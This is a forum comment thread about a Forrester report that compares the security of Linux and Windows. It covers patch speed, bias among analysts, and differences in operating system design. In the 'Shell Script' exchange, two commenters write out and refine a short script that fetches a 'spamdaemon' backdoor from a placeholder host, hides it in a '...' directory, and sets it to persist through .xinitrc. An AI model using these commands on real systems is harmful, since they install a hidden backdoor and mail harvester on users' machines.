Because anyone with elementary VB skills can do it since it's so easy. Junior High level programming skills are all thats needed, and any language or scripting language more advanced than VB is just better, not really harder. M$ leaves too many holes and always will untill they start over with a clean sheet and do a complete rewrite with no copy and paste from previous versions.

If you look closely enough you can still find a few lines from Win 3.0 in XP.

Re:Why worry about this ?

Yes. Exactly. Let's worry about the basics first.

Is your camera plugged in?

Their opinion is meaningless

[codepunk]

Sort of like the one that I seen yesterday that says that linux cannot scale as good as unix. Nevermind it currently holds the TPC-C record. As for security does Windows have the flexibility to run port knocking? Can I modify all of the port settings for all of the services in Windows?

One of the biggest strenghts in linux is it's flexibility. Windoze lacks the flexibility required to create a diverse environment.

I hereby declare that Windows security is not as good as Linux.

Something True

[Deviate_X]

Yeah! Its So Obvious Linux Is More Secure Than Windows!

Just Don't Store Your Important Source Code On It.... :))))))))))))

do your homework DUDE!!!

the forrester guys obviously arent familiar with the open source process. sure, patches aren't "released" for longer, but:
a) any admin can opt to install an early (sometimes buggy itself, sometimes not) version of the patch before their "vendor"(red hat, mandrake, etc) officially ok it.

b) the source code is right there, staring at the admin, just a cd away. If the bug is that mission-critical the admin needs to get off his lazy ass and hack together a patch until a better one is released, and possibly even get on whatever mailing list in involved and throw his source at it (if his contract allows). You never know, it might surry the official patch up quite a bit. Under the Windows model, this is all but impossible.

c) Microsoft patches are a joke. They usually fix the intended problem by the second, sometimes third try. However, there are long complained about IE and Outlook vulnerabilities that have leaped the gap of major version changes! You know, the version changes that cost companies TENS OF THOUSANDS OF DOLLARS.
my $0.02
Oh, and a d!
d) What home user really uses Microsoft update? Not very many, because it's a pain is the ass. Fedora's model of a simple "yum update" is blissful. I would guess the RH's enterprise offerings are even better. When was the last time an update to your linux system (save a kernel update) required a reboot? never, or close to it. This happens routinely in Windows Update. Once more, WINDOWS UPDATE IS A PAIN IN THE ASS TO USE. As a result, many many machines are not patched, not after it is released, not a month later - NEVER.
the end
for real this time.

Yes, these reports are usless.

I should know, I just did a bunch of research on the web for my boss to write a whitepaper about the proformace of a scientific application on various highend servers. We have no evidence, just what others posted on the web.
I assume all whitepapers are done this way.

Posting AC to keep my job.

Actually

[PedanticSpellingTrol]

While you sound like the commendable type who's willing to spend the money to support further development, for the sake of accuracy I feel compelled to mention that you don't have to spend the initial penny on SuSE professional, you can install it over FTP from any of several servers. 129.79.5.130 is pretty fast :-)

Re:Actually

[cornjones]

Though, if you love it so much and it does so much for your organization, why don't you buy the distro every year or so. Continue funding the development you like so much.

You can say a lot about Forrester...

[Dj-Cj]

but this isn't MS commisioned. The group Koetzle works in meets and plans research topics by what they think will be the biggest things on IT directors minds. FORR used to pride themselves on not doing commisioned research (this may have changed in the last couple of years, but AFAIK it hasn't). If anything the biggest flaw is in the research. For the most part it's 50 companies that they can get on the phone. Some of the analysts have never worked in the fields they cover, they just learn by reading about it and talking w/vendors. One might write about the future shakeout of programming languages, but never even compiled "hello world". The product suffers w/out the experience and underlying knowledge of the topic.

Re:Linux

[jtev]

Dude, lay off the troll juice a little. I have used Windows XP and I have to say that plucking out my eyeballs with a shopvack would be less painfull than that candy coated shitfest. I used to think that KDE was to damned cartooney, but then I saw OS X and XP and I decided that EVERYONE is going cartooney, then RHS betrayed me with that abomination that is Blue Curve. STRAIGHT LINES people, I want STRAIGHT LINES, and not disgusitng bubble gum colors, make things look like something that a profetional would use, not a crappy candy coated bloatfest. Anyway I guess I'm done ranting. For now anyway.

In our shop windows is really safe

[codepunk]

We got rid of all of our windows boxes so I guess it would be easy to claim it is safer because it no longer exists.

will make a good 'letter to the editor'

[LuxFX]

This is just one of the great things about Linux (or any open source project):

Say an article about security is published in a magazine. The article takes a really good critical look at Linux vs. Windows and genuinely points out a few areas of improvement. Well, that just prompts the open source community to rev up their engines and (should they agree with the evaluation) they'll just go out and fix it! In fact, there's a pretty good chance that the fix is available in a development version in time to send a letter to the editor for the next month's issue.

Now compare that to Windows. Microsoft would spend two, maybe three times that long debating with the media about whether or not it's a problem or a 'feature', and then whether or not it will be fixed immediately or we have to wait until 2031 for Looooooonghorn to be released. Then they'll just sit on it for a while to see if people really care about it being fixed, and how much. They might also, at this point, have their lawyers spend three weeks writing the licensing agreement for the patch, should it be created. Then they put the whole thing on hold and wait until somebody exploits the problem. Then, only if everything else has gone completely in their favor and the problem has been exploited and the existance of the problem has reached at least two major media outlets, they might work on a patch and distribute it....

Then Microsoft will brag about how quickly they've updated their software in response to the problem... ...as Linux is releasing the seventeenth update since the article....

Re:Linux

Windows XP still has the option to use the classic skin. If all you want is straight lines, XP has that covered. You know you want to come back to the greatest OS ever invented!

The missing option...

[DrYak]

The article underlines the differences in urgencies and speed of responses :

They focus mainly on critical update, and sometime delay less critical (first fix the bug in SSL, then fix the bug that happen if some uses GAIM to log into some alternate non-standart [not owned by Yahoo] Yahoo server), therefor explaining why unbalanced average seems bad.

But I think they missed the second important thing :
You shouldn't compare the amount of patcheds between a full distro, and a Windows systeme.

To be fair, you should compare the distro, with whole Microsoft patches for Windows+IIS+ASP+Office+VisualStudio+etc...
or compare patches to Linux Kernel+a few core librairies and applicaction to Windows.

And I don't think that way Linux distro will seem that much patchy, compared to Windows.

"Debian, Mandrake, Red Hat, and SUSE"

"Debian, Mandrake, Red Hat, and SUSE" And when they combine their powers into one, they become... VOLTRON!

A comment on Forrester from one of their own.

[ron_ivi]

Rob Enderle, formerly of Forrester writes:

I got hate mail from other employees, and my employer, Forrester, was threatened to a level they had never seen before either. I was actually told, subsequent to this, that I was never to write about Linux again which was something that had never, to my knowledge, ever happened before.

This actually became one of the core reasons I used when I resigned from Forrester, no one had ever dictated a position to me before and that had clearly changed. I've always had a problem with opinions for hire and had been very active in fighting that trend; opinions as a result of personal threat seemed much worse and, while this was hardly the only reason for my departure, it was a major one.

Re:A comment on Forrester from one of their own.

Never trust anyone who calls themselves the Enderle group.

Re:A comment on Forrester from one of their own.

[slipstick]

Never believe anyone who refers to the use of shared public domain code as "theft".

From the rest of that article Enderle obviously has an axe to grind. It is quite possible he was threatened by a minority in the Linux community that can't seem to grow up and has obviously decided to hold a grudge against Linux as a whole.

His argument for taking SCO's side boils down to "I'm pissed at some Linux fanboys!" That's fine but I hope he doesn't expect anyone to ever take him seriously as an analyst again(if they ever did). Almost by definition Analysts and Critics must have a thick skin because there's always someone who is going to insult them. Once they lose their objectivity they are effectively washed up.

He further insults the integrity of Groklaw without actually pointing to any flaws in the facts that Groklaw presents. He ignores all the evidence mounting up against SCO and the fact that SCO has been back pedaling so fast they're tripping over themselves to get out of the way of the coming storm.

Re:A comment on Forrester from one of their own.

[stephanruby]

Never believe anyone who refers to the use of shared public domain code as "theft".

Here is the quote you're referring to -->

For me the course of events looked like the community had said once a crime had been committed that "there is no evidence", then when evidence was found they changed their tune to say "what was stolen didn't belong to SCO in the first place". If they had started with the second position and behaved reasonably I might have believed them, since they didn't, I didn't.

Not only is this guy saying that the shared public domain code is theft, but he put quote marks around it and makes it sound like a linux supporter actually said "what was stolen didn't belong to SCO in the first place". Apparently, he's paraphrasing what a linux supporter said and now he's putting quotes around it as if it was said verbatim. Am I right? I'm not a native English speaker, so if someone else has a better explanation for his use of quotes -- please let me know.

Re:A comment on Forrester from one of their own.

Am I right? I'm not a native English speaker, so if someone else has a better explanation for his use of quotes -- please let me know.

Technically, you are correct. But the voice, tone and the specific reference to 'the community' doing the speaking make it obvious he is paraphrasing.

Re:A comment on Forrester from one of their own.

[kraut]

Just goes to show what every sensible person already knows: The more rabid the "advocacy", the more counterproductive it is.

Re:A comment on Forrester from one of their own.

First off, mod him up further.

Secondly, the link to an article by Rob Enderle is as disgusting, vile and repulsive as anything by goatse.

Numerous strawmen (hmmm, most seem to be women!) are brought up and put on fire with the same triumphant sickening self congratulatory text.

Read it and see what kind of poo is sold as analysis. Disgusting.

Re:A comment on Forrester from one of their own.

[superflippy]

Never believe anyone who refers to the use of shared public domain code as "theft".

I generally follow the rule "never believe anyone whose name is Rob Enderle."

Re:A comment on Forrester from one of their own.

[slipstick]

You are partly correct.

He is indeed making it sound as if a Linux supporter was quoted verbatim but in fact no Linux supporter ever sayed anything about "stolen" code(at least none that I am aware of).

Unless I'm mistaken the series of events he is referring to involves SCO showing purportedly "stolen" code during a PowerPoint presentation. The code snippets were tracked to BSD code which had previously been placed in the public domain(or as close as you can get).

Every piece of purported evidence that SCO has dained to release has been soundly discredited.

In english we do not call this paraphrasing we call it an "attempt to deliberately mislead and deride", some might call it "mocking". Had he actually made it sound like a specific individual made the "what was stolen..." comment he could quite possibly be sued for defamation of character. Instead he refers only to "linux supporters", a group can't sue for comments like this.

Furthermore he even "begs the question" by stating "once a crime had been committed" when in fact no crime has been committed or at least none has yet been proven and the way the case is going none is likely to be.

The whole article is written in a manner to deride the linux community rather than support a position as to why he believes SCO is correct. He refers to linux supporters as criminals completely without evidence, gee that's sure unbiased. I'm sure like any large group there is a criminal or two in it but as a whole we are as law abiding as the next person.

Re:A comment on Forrester from one of their own.

that SCO has dained to release

Just so you know, that word is 'deigned'.

Re:A comment on Forrester from one of their own.

[jejones]

Never trust anyone who calls themselves the Enderle group.

On the contrary, it's eminently appropriate. Ask any mathematician: there's a unique (up to isomorphism) group with one element, called the trivial group.

Re:A comment on Forrester from one of their own.

[boisepunk]

allah is great
crap post
karma will be mine

farewell all

Re:A comment on Forrester from one of their own.

[boisepunk]

karma will be mine
allah is great; praise be to him
crap post
glorious jihad

amen

Well duh.

[tgd]

As a result, the conclusions drawn by Forrester have extremely limited real-world value for customers

Thats probably why they went from having all but two floors of the building they were in in Cambridge to only two floors and part of a third.

Don't forget

[geekoid]

Forester was intsremental in trying to stop the martian. In fact, he brought one of their 'eye pieces' in for study. In the end, it was are basteria that did them in though.
Dr. Forester also has a plane.

Re:Don't forget

[geekoid]

Note to self, re-read post 3 times when drinking.

Re:Don't forget

[shadowbearer]

Hee, I've done that a time or two *cough* :-)

SB

My Take..

[naelurec]

I didn't read the report, as I am sure most of you haven't, simply because it is $899 to tell me something that I already know otherwise.

Anyways, my question is about the severity of the vulnerabilities. When you get right down to it, Microsoft generally only offers one web server, one mail server, one database server, etc..etc..etc.. A standard distribution OTOH includes a huge array of software. For example, I can choose sendmail, postfix, qmail, exim and others for my mail server; apache, aolserver, boa, dhttpd, zope, etc for my web server; php, ruby, python, perl, cgi, etc for my scripting needs; mysql, postgresql, berkley db, firebird, etc for a database; gnome, kde, xfce, etc for a window manager ..

you get the point.

In addition to the multitude of different configurations that I could have for a particular system, I can also, if desired, cut out everything that is not essential to maintain as barebones of a system as possible (heck this even includes lots of kernel modules/features).. I can run everything through a localized firewall, block ports, limit IP ranges for various services, chroot/jail certain services, etc..etc..etc..

So I guess my question is:

1. Does this report simply gather up all published security issues and compare? Or do they look at "best practices" on both platforms and only compare packages that, for example, would be installed on a web server, mail server, database server, standard desktop, etc?

2. What is the true damage that could be done by successfully exploiting these issues? Ie, I'm sure most BIND installations are in a chroot/jail .. so even if that was exploited, a cleanup on a *nix machine would be significantly faster than perhaps a Windows box that does not chroot its respective DNS service.

Sure, raw data might indicate that a Red Hat distro has the same number of exploits as a Windows system, but I am much more interested in the applicability of those exploits to my systems and ultimately the increased chance of exploit.

Re:Linux

[jtev]

You're right, I do want to go back to the greatest OS ever invented, but fortunatly I'm about to go home, so my GNU/Linux box is only about half an hour away.

oranges and prime numbers

[fluxmix]

why are we arguing about what kind of oranges we like? i mean linux, windows, and os x are different types of oranges (cli + gui = os) this is boring already. lettuce have salad and eat a new computer interface:

SmellOS

i wrote it yesterday and got it to run on a 286 tandy and an old gameboy i had laying around i just hooked them up to different essential oils now my inbox smells like spruce (get it PINE!)

Re:Analyst hacks will never bit the hand that feed

[fferreres]

The IT research firm I work for has been contracted by Microsoft to study the Linux vs Windows value to corporations just recently (last week).

Microsoft, for the first time, paid in full advance even before a full proposal could be drafted, or even basic details.

They initially wanted a TCO study, and our CEO told them to NOT DO THAT, he is very honest, and knew beforehand Windows would lose. On the other hand, ew do not know what will happen.

The reality is that under some very common scenarios, at least where I live, Linux expertise is regarded as expensive, and that some Microsoft apps allow companies to get work done quicker.

If you where to look at the Linux trend of adoption, growing support, etc., regarded retraining costs as an investment into future savings, noted that Microsoft is free to change it's pricing policy anytime, and they can force you to demand more than you want in the future, and that after 3 years you own nothing at all (license obsolete, or app obsolete), then you'll see Linux wining by large.

But guess what, Research firms, even unbiased ones, tend to choose scenarios that are real world, but benefit their customers more.

If IT adopters where the ones financing these research studies, then the story would be different. But guess what? They dont pay much, and if they do, then Microsoft and the likes can double the bet to get what they want or, as someone else put it, they'd pay you $400 so that you'll "agree" with whatever their CIO believes is true. The same happens with newspapers, what you read is 90% dicatated by the ads they can sell in that "section". Thats why you always see some Cars suplement, because people like it, but MORE importantly, because they can sell expensive adds.

If you want unbiased researchers, find a way to fund that does not involved their reveneus depending on an interested party.

*nix is still more secureable

[Xenographic]

Okay, true. There are some Windows lockdown tools. Some are even pretty good. Of course, there are also things like that nasty "shatter" attack... You know, the badly designed bit of protocol that makes windows (the objects) vulnerable if they have an edit control, are on the desktop, and have admin privs.

Now, of course, you may say that good coding practices (and how I wish that we all used good practices!) dictate not to have a vulnerable window with an edit control to be vulnerable to that.

I've heard it compared to a SUID root program with an overflow. My question is: How do you audit your system for crap like that? Mind you, finding ALL SUID root executables is a single command on *nix.

This is just a small example of how *nix is more secureable than windows.

Another would be this: we all know about format string bugs. Nasty chars can be injected and will cause overflow problems in anything that uses them improperly. In *nix, a few appropriate greps will allow me to find (and fix!) ever single such bug in Linux (SFAIK, there aren't any, but the point here is that I can *check*). How many are in Windows? How do you know? I don't relish the thought of reverse engineering Windows to check, moreover the EULA says that I cannot (whether or not this EULA is actually enforceable, I leave to others to debate).

Suppose another such category of exploits is discovered; what can you do? I can grep, you cannot. And think before you speak--even a code monkey can grep for things like format strings & bug someone else to fix it.

Linux is secureable, Windows cannot be ... unless it were set Free (libre), perhaps...

As for who is the most secure, that's OpenBSD, hands down. Theo may not be the most likeable person ever, but he keeps OpenBSD secure. I half-wish he'd audit Linux, but I'm sure he'd probably just drive the core developers nuts...

someting along the lines of...

[zogger]

... underwriters laboratories or like consumer reports magazine? Are there any other remotely credible industry neutral testers or analysts out there?

Re:someting along the lines of...

[fferreres]

I think there are, just not on all subjects. Also, the "waters" are divided whan two competing important customers demand the same study. For example, AMD and Intel are customers, so there is no unintentional biasing there, and there is no biasing in estimating markets in general. When studing demand (what they need), there also no biasing. Also, any biasedness in the case of the MS study will be complemented by IBM being an important customer. So I will try to keep the Linux vs. Microsoft study neutral, but the point is...99% of the analists here haven't even SEEN a Linux screen, and they somhow react in the same way when they ignore something, they are at a huge disavantage if anything they don' t have a clue about succeeds. Same with admins.

It's very difficult to be 100% unbiased...but you tend to speak better of what you know better. And also, nobody will complain if you say Windows is just a bit more valuable for X kind of company, and many WILL if you say otherwise.

TCO and ROI analisys will always be biased, even companies like HP and IBM do this kind of analisys for their clients (or a third party does those for them) and guess what? They always have a better ROI for their outsourcing solutions for example.

In brief, it's easy to lie with statistics, but some facts do not change. Linux is growing, people are finding it usefull, no matter what we say. Even myself, a Linux enthusiast, dont feel like "pushing" for Linux any harder than they can accept...

What no one's said...

Is that the basic Linux system architecture is more secure.

Once viruses and such have been downloaded by a stupid user, Windows makes it easy to run them; the default account is effectively root. On Linux, or any kind of Unix, the damage a virus can do is largely confined to the user's home directory. To do system-wide damage, a program would have to be run as root; if you login as root to read your email, you deserve to get screwed.

Even that assumes that the user actually runs the virus. A non-technical person doesn't know how to use chmod and set execute permissions. In Linux, there is no .exe.

I don't think there's even a chroot() in Windows. I could be wrong; my knowledge of the Windows API is pretty bad. But assuming I'm right, that makes it much more likely that malware and corrupted services can get access to the whole filesystem tree.

In short, Windows is "surface-heavy." Once you get past that nice, user-friendly GUI, there's not much worth looking at.

"masters of sqibbling excuses"

[Rolf+Tollerud]

Some day the Linux losers will wake up and realize how patetique this again and again "report bought by Microsoft" sounds to others.

Re:"masters of sqibbling excuses"

[ozmo]

micro$, everything to eveyone......

Re:"masters of sqibbling excuses"

[Thundersnatch]

"A fanatic is one who can't change his mind and won't change the subject."

-Winston Chruchill

Re:Analyst hacks will never bit the hand that feed

[igloo-x]

Fucking beautiful. Absolutely beautiful.

Re:Analyst hacks will never bit the hand that feed

[slipstick]

While I agree with your fanboy critique your criticism that any attempt to denounce a study in favor of Microsoft is always a knee jerk reaction simply isn't relevant in this particular instance.

I don't know if you took the time to read the response from the Linux vendors to the Forrestor report but it is clear that if Forrestor conducted the analysis as described that they made a HUGE statistical error. The question naturally must be asked "how could a supposedly well funded source miss such an obvious gaff?" It takes time and money to do research, surely Forrestor has one above average statistician on staff.

To have performed such a study and in the end wasted their money would seem incredulous. This is akin to being asked to write a word processor and coming up with a spreadsheet program. A natural supposition than is to question the motives of the researchers, however this could easily be a case of "never put down to malice what can easily be attributed to incompetence."

Shell Script

Can you actually write a shell script that takes control of the system?

Easy,

wget http://myfunkyurl.ru/spamdaemon
mkdir ...
cp spamdaemon ...
cd ...
chmod +x spamdaemon
echo "~/.../spamdaemon" > ~/.xinitrc
./spamdaemon

The spamdaemon sets up a remote backdoor, starts harvesting mail addresses in ~/Mail, and does all the usual stuff Windows worms do.
With SELinux, this might become a lot more difficult though. e.g. it could prevent you from running programs that haven't been installed using signed packages.

Re:Shell Script

[meringuoid]

wget http://myfunkyurl.ru/spamdaemon
mkdir ...
cp spamdaemon ...
cd ...

Wouldn't this leave a suspicious-looking file called spamdaemon in (probably) the user's home directory? Why not create ... first, cd into it and _then_ wget your nasty program?

chmod +x spamdaemon
echo "~/.../spamdaemon" > ~/.xinitrc

This should probably be a >>, not a >. You'll overwrite the existing .xinitrc, mess up a whole bunch of startup scripts and the user will take the computer to a geek to be fixed.

Also, what if the script was originally run in a directory other than ~? Wouldn't spamdaemon would then be in ~/somewhere/somewhereelse/.../spamdaemon?

I'd do:

cd
mkdir ...
cd ...
wget http://www.myfunkyurl.ru/spamdaemon
chmod +x spamdaemon
echo "~/.../spamdaemon" >> ~/.xinitrc
./spamdaemon

Re:Linux

[iamacat]

make things look like something that a profetional would use

Like a web browser with a spell checker perhaps?

You're probably right mrs. Koetzle, aren't you?

[triptolemeus]

"The bottom line? Any of these platforms can be operated securely," said Koetzle. (Koetzle is the leader of the Forrester Team).

Now have a look at yesterdays Slashdot Virus article.

A bug is a bug

[iamacat]

A slight bug in locally installed setuid program usually gives access to that acount. A slight bug in remotely callable program usually creates a remote exploit with enough determination or at least a nice, satisfying denial of service. For example, if your server logs long audit messages for each failed login, I can just keep calling until your machine runs out of disk space.

Therefore, I think it's justified to count all security bugs of measurable consequence and not try to assign an exact priority. What makes sense is setting up stripped-down Linux servers that only run the top-tested software. If you run a web server with perl, python, tk and shell scripts as apache modules, you might well have more bugs than the fully patches IIS with no extra stuff installed. On the other hand, if you stick to tomcat and well-written J2EE apps that always use prepared statements for user's input and set up a firewall to reject all incoming traffic except ports 22, 80 and 443, you probably have more worries about physical access and kidnapping than remote exploits.

More statistics

[markcox]

So one of the points we make in the joint statement is that the Forrester report treats all vulnerabilities as equal. After all the time and effort we all put into the raw data set, seeing it boiled down to a simple mean average is disappointing.

Anyone who follows the security advisories for any Linux distribution knows that the critical fixes are fixed first and fixed quickly. Let's take the Microsoft definition of a "critical vulnerability" for example. Then for Red Hat Enterprise Linux in the 21 months from release to March 2004 there were 13 CVE named issues that matched the definition. 77% of those were fixed within a day of them being public. The mean was 1.1 days.

Even if we take into account attacks Microsoft would not class as critcial; things like privilege escalation, remote DoS, information leaks, etc. then we get to 47 CVE named issues where 57% were fixed within a day of them being public. The mean was 7 days.

You'll see the same effect for all the Linux distributors mentioned in the report. However not even all "critical" vulnerabilities have the same risk to all users - you might not be using fetchmail, or your box might not have an SSL-enabled webserver. So really, to get an accurate assesment of "days of risk", you need to look at which of the vulnerabilities affected you, which posed the most risk to your organisation, then see how quickly your vendor fixed them.

-- Mark

My Real World Experience Disagrees With Forrester

[Long-EZ]

Every day, I receive 20-30 Netsky worms, courtesy of Windows machines.

Much of my daily spam now comes from compromised Windows boxes being run as spam zombies.

My personal data was stolen from a company I trusted because their server was running IIS and it was infected with Slammer.

I suffer because of Windows insecurity almost constantly, yet no operating system *except* Windows has ever caused me any such grief. Clearly the Forrester "data" is FUD. Plain and simple.

Fine grained privileges or security

[Per+Abrahamsen]

You can have one of the two, but not both.

Back before I became a law-abiding citizen, my experience was that the more fine grained the privilege system is, the easier it is to crack. The key is that you get first some small, insignificant privileges, and then use these to gain some slightly larger privileges, and so on. On Unix systems, the key to breakin tended to be sgid, nor suid.

If administrators and users are both compentent and careful, breaking in is hard. But it is easier to be incompetent for a complex system, and it is more common to be lazy if less apparently is at stake. "Ok, if someone work around this, they will get access to the shared printer. Not worth worrying about".

Junction points for containment

Windows supports junction points, which can be used (but I've never seen used) to contain a particular application to a particular volume

Details?

Re:I recevied it in my mail and I couldn't believe

[anno1a]

I wouldn't really want Debian to join forces with the larger software houses. Debian is truly free, and I love that it stays that way. Furthermore I like the Debian way of doing things, while I recent the Redhat way - that's why I use Debian, and wouldn't want a merge to change this.

mod parent up, not flamebait at all

[lucas+teh+geek]

mod parent up, not flamebait at all

Why not mention the amount of software itself

[rob_kg]

What is this test based on? On all vulnerabilities of packages that these distributions maintain against the Windows operating system? How do they go about evaluating which software should be part of this? How about Desktop vs. Server use? Man, everyone runs such a wide range of different application sets! Maybe a good comparison would be to have Linux system with: - Kernel - Most common GNU software - Apache - PHP - KDE or GNOME - Mozilla - OpenOffice.org Against all Microsoft security bulletins, their severity. But then there must also be estimated the percentages of uses like howmany Windows users have IIS enabled and howmany Linux users use OpenOffice on howmany machines they have. Also, not unimportant; howmany time did the bug trackers gave vendors to create the patch? For example the do_brk exploit for Linux was private for some time before it leaked so it was impossible for vendors to make the patch before the news was public knowledge. There's just toomuch to think about to come to an accurate conclusion.. even impossible, cause how do you track the use of certain software in the Open source community, and ofcourse the Windows user base. Never believe such reports..

Poor response letter

[gr8_phk]

Linux supporters should be ashamed at this response letter. It makes points about how the study misinterpreted the data, but offers no alternative analysis or conclusions. It's basically saying "they're wrong because the didn't do X" without showing how the results differ if you do X. Go ahead and tell someone they are wrong, but please show it. They haven't shown the methodology to be wrong until they show that changing it produces different results. I expect the results to change, but I don't know by how much without data - perhaps they're raving about nothing.

Re:no way? Yes way!

[Daytona955i]

Damn straight I will. Why? Because one group
represents the best interests of a bunch of fat
asses who got rich off the rest of us, and the
other not only represents the best interests of
my community, it IS COMPOSED OF MY COMMUNITY.
Just because they are part of your community, doesn't necessarily mean they have your best interest in mind. Most of them (with the exception of Debian) are still a company trying to sell a product. I'm not saying they don't have our interests in mind, I'm just saying your logic is flawed.

The biggest problem with "reports" like these is that Microsoft has huge pockets that often help to "fund" them. Fortunately the linux organizations aren't that unethical. (or at least they haven't done anything to date that we know about)

The biggest problem is "activists" like you who ruin it for the rest of the linux advocates. Or you could just be a troll and I just wasted my time.

Re:Linux

[jtev]

Yeah, that'd be cool, to bad I was using IE from work to make that post.

Re:If you think that mass-circulated study is bad.

That's because doing wrong gets you fired and there are LOTS out-of-work IT guys waiting for that job, no matter the pay.

Snake Oil

[sglines]

Does anyone remember when Ken Olsen called Unix snake oil? About 6 months later that Ken Olsen was history and 10 years later so was DEC.

Just cause Forrester says something doesn't make it so.

Re:Analyst hacks will never bit the hand that feed

[Rich0]

Surprisingly, Microsoft did the best job at patching vulnerabilities fast, even though it ranked at the top with the largest percentage of its security holes rated as high

So they DID acknowledge that Microsoft's platform had the most HIGH RISK vulnerabilities, althought this fact is glossed over in the article. Koetzle also acknowledges that the study did NOT look at how WELL the patches addressed the problem (MS often needs to issue more than one patch to get it right, and sometimes they fix one bug and introduce another).

Also - note that MS frequently doesn't announce a vulnerability as soon as they find out about it. They might sit on it for a few weeks and then release the patch at the same time. Hardly an accurate assessment of how fast they fix vulnerabilities. I'm not sure what methodology was used, but they should only measure response times to vulnerabilities that are published publicly at the same time that the vendor finds out about it. I'm not convinved they'd fare better than linux in this case...